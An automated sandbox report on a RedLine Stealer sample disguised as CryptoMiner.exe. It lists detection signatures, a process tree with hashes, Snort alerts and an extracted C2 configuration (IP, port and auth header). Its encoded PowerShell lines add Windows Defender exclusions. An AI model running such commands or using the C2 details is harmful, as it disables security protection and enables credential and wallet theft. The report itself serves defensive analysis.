Edit tour
Windows
Analysis Report
CryptoMiner.exe
Overview
General Information
Detection
RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Classification
- System is w10x64
- CryptoMiner.exe (PID: 6428 cmdline:
"C:\Users\ user\Deskt op\CryptoM iner.exe" MD5: 310EB5BD45AC9C5767D28E63AB64635B) - InstallUtil.exe (PID: 2140 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\Inst allUtil.ex e MD5: EFEC8C379D165E3F33B536739AEE26A3) - fname.exe (PID: 6720 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\fname. exe" MD5: C61F9A9059F8B8BD0E69F7DF4CB09786) - conhost.exe (PID: 6712 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - AppLaunch.exe (PID: 5972 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\AppL aunch.exe MD5: 6807F903AC06FF7E1670181378690B22) - filename.exe (PID: 4584 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\filena me.exe" MD5: C108EBDD14A2CF40E64411792987796A) - cmd.exe (PID: 6560 cmdline:
"cmd" cmd /c powersh ell -Encod edCommand "QQBkAGQAL QBNAHAAUAB yAGUAZgBlA HIAZQBuAGM AZQAgAC0AR QB4AGMAbAB 1AHMAaQBvA G4AUABhAHQ AaAAgAEAAK AAkAGUAbgB 2ADoAVQBzA GUAcgBQAHI AbwBmAGkAb ABlACwAJAB lAG4AdgA6A FMAeQBzAHQ AZQBtAEQAc gBpAHYAZQA pACAALQBGA G8AcgBjAGU A" & power shell -Enc odedComman d "QQBkAGQ ALQBNAHAAU AByAGUAZgB lAHIAZQBuA GMAZQAgAC0 ARQB4AGMAb AB1AHMAaQB vAG4ARQB4A HQAZQBuAHM AaQBvAG4AI ABAACgAJwB lAHgAZQAnA CwAJwBkAGw AbAAnACkAI AAtAEYAbwB yAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4036 cmdline:
powershell -EncodedC ommand "QQ BkAGQALQBN AHAAUAByAG UAZgBlAHIA ZQBuAGMAZQ AgAC0ARQB4 AGMAbAB1AH MAaQBvAG4A UABhAHQAaA AgAEAAKAAk AGUAbgB2AD oAVQBzAGUA cgBQAHIAbw BmAGkAbABl ACwAJABlAG 4AdgA6AFMA eQBzAHQAZQ BtAEQAcgBp AHYAZQApAC AALQBGAG8A cgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
- cleanup
{"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
Click to see the 11 entries |
⊘No Sigma rule has matched
Timestamp: | 05/05/22-03:30:52.519175 05/05/22-03:30:52.519175 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:54.158486 05/05/22-03:30:54.158486 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:54.966150 05/05/22-03:30:54.966150 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:46.265169 05/05/22-03:30:46.265169 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:55.048172 05/05/22-03:30:55.048172 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:51.349484 05/05/22-03:30:51.349484 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:51.712280 05/05/22-03:30:51.712280 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:52.800684 05/05/22-03:30:52.800684 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:52.844061 05/05/22-03:30:52.844061 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:55.007583 05/05/22-03:30:55.007583 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:40.973991 05/05/22-03:30:40.973991 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:32.990118 05/05/22-03:30:32.990118 |
SID: | 2850027 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:46.475836 05/05/22-03:30:46.475836 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:52.885401 05/05/22-03:30:52.885401 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:51.428831 05/05/22-03:30:51.428831 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:51.508362 05/05/22-03:30:51.508362 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:34.048200 05/05/22-03:30:34.048200 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:54.760590 05/05/22-03:30:54.760590 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:34.088289 05/05/22-03:30:34.088289 |
SID: | 2850353 |
Source Port: | 32936 |
Destination Port: | 49796 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:54.711716 05/05/22-03:30:54.711716 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/05/22-03:30:51.576541 05/05/22-03:30:51.576541 |
SID: | 2850286 |
Source Port: | 49796 |
Destination Port: | 32936 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | DNS query: |
Source: | String found in memory: | ||
Source: | String found in memory: | ||
Source: | String found in memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |